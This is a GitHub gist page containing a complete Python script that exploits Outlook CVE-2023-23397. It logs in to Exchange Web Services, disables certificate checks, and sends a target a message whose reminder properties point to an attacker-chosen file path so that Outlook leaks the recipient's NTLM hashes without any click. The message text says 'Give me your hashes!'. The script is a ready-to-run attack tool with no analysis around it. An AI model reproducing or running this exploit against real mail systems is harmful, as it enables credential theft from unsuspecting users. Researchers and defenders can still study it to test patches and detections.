Skip to content

Instantly share code, notes, and snippets.

@tothi

tothi/PidLidReminderPwn.py

Created March 28, 2023 09:30
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
  • Save tothi/d2d6c6a3e8b1d72ce6646d8683326e49 to your computer and use it in GitHub Desktop.
Save tothi/d2d6c6a3e8b1d72ce6646d8683326e49 to your computer and use it in GitHub Desktop.
Download ZIP
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
Raw
PidLidReminderPwn.py
#!/usr/bin/python -u
from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty
from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW
from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter
BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import argparse
parser = argparse.ArgumentParser(description='Outlook CVE-2023-23397: 0-click PrivEsc')
parser.add_argument('-u', '--username', required=True)
parser.add_argument('-p', '--password', required=True)
parser.add_argument('-s', '--server', required=True)
parser.add_argument('-t', '--target', required=True)
parser.add_argument('-f', '--filepath', required=True)
args = parser.parse_args()
def log(msg):
print(msg, end="")
log("[*] Logging in to EWS...")
credentials = Credentials(args.username, args.password)
config = Configuration(server=args.server, credentials=credentials)
account = Account(primary_smtp_address=args.username, config=config, autodiscover=False, access_type=DELEGATE)
log(args.username+"\n")
class PidLidReminderTime(ExtendedProperty):
property_set_id = '00062008-0000-0000-C000-000000000046'
property_id = 0x8502
property_type = 'SystemTime'
class PidLidReminderSet(ExtendedProperty):
property_set_id = '00062008-0000-0000-C000-000000000046'
property_id = 0x8503
property_type = 'Boolean'
class PidLidReminderFileParameter(ExtendedProperty):
property_set_id = '00062008-0000-0000-C000-000000000046'
property_id = 0x851f
property_type = 'String'
class PidLidReminderOverride(ExtendedProperty):
property_set_id = '00062008-0000-0000-C000-000000000046'
property_id = 0x851c
property_type = 'Boolean'
class PidLidReminderPlaySound(ExtendedProperty):
property_set_id = '00062008-0000-0000-C000-000000000046'
property_id = 0x851e
property_type = 'Boolean'
class PidLidFlagRequest(ExtendedProperty):
property_set_id = '00062008-0000-0000-C000-000000000046'
property_id = 0x8530
property_type = 'String'
class PidTagFlagStatus(ExtendedProperty):
property_tag = 0x1090
property_type = 'Integer'
class PidTagFlagComplete(ExtendedProperty):
property_tag = 0x1091
property_type = 'SystemTime'
log("[*] Building malicious email message...\n")
message = Message(account=account, folder=account.sent, subject="You Have Been Pwn3d!", body="Give me your hashes!", to_recipients=[args.target])
message.register('PidTagFlagStatus', PidTagFlagStatus)
message.register('PidTagFlagComplete', PidTagFlagComplete)
message.register('PidLidFlagRequest', PidLidFlagRequest)
message.register('PidLidReminderSet', PidLidReminderSet)
message.register('PidLidReminderTime', PidLidReminderTime)
message.register('PidLidReminderFileParameters', PidLidReminderFileParameter)
message.register('PidLidReminderOverride', PidLidReminderOverride)
message.register('PidLidReminderPlaySound', PidLidReminderPlaySound)
log("[*] Registered Extended Properites...\n")
log("[*] Setting values...")
message.PidTagFlagStatus = 2
message.PidLidFlagRequest = 'Pwn!'
message.PidLidReminderSet = True
message.PidLidReminderTime = UTC_NOW()
message.PidTagFlagComplete = UTC_NOW()
message.PidLidReminderFileParameters = args.filepath
message.PidLidReminderOverride = True
message.PidLidReminderPlaySound = True
log("DONE.\n")
#print(message)
log("[+] Sending message...")
message.send_and_save()
log("SENT!\n")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment